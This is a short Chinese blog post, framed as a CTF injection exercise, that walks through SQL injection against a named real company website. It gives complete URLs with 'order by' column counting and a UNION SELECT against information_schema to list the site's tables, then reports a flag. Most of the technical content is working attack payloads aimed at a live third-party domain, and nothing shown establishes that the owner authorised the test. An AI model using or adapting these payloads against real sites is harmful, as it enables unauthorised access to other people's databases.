CTF 注入 http://www.kabelindo.co.id/

作者: 耗子 分类: 渗透实战 发布时间: 2017-11-10 14:51

新开的一栏是渗透实战,把一些经验分享给大家,一起进步,一起分享。给大家一点思路。这段时间会更新这个。

网站:http://www.kabelindo.co.id/

图片1

 

首先看到的就是那个搜索框,先F12,看了看,发现action没有跳转,

然后继续找一找,随便看一看。

图片2

NEWS这个里面的连接一看就是可能注入的,而且是GET比较好测试,所以先试试这个。

首先用单引号和双引号去测试一下,发现都出现错误,应该就是没有引号,直接就开始爆字段个数了。

http://www.kabelindo.co.id/readnews.php?id=18 order by 5 –+

图片3

 

然后直接开始爆表

http://www.kabelindo.co.id/readnews.php

?id=-18 union select 1,group_concat(table_name,0x0a),3,4,5 From information_schema.tables Where table_schema=database()

图片4

最后一个表直接出来了,所以答案就是:

flag{tbnomax}

 

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注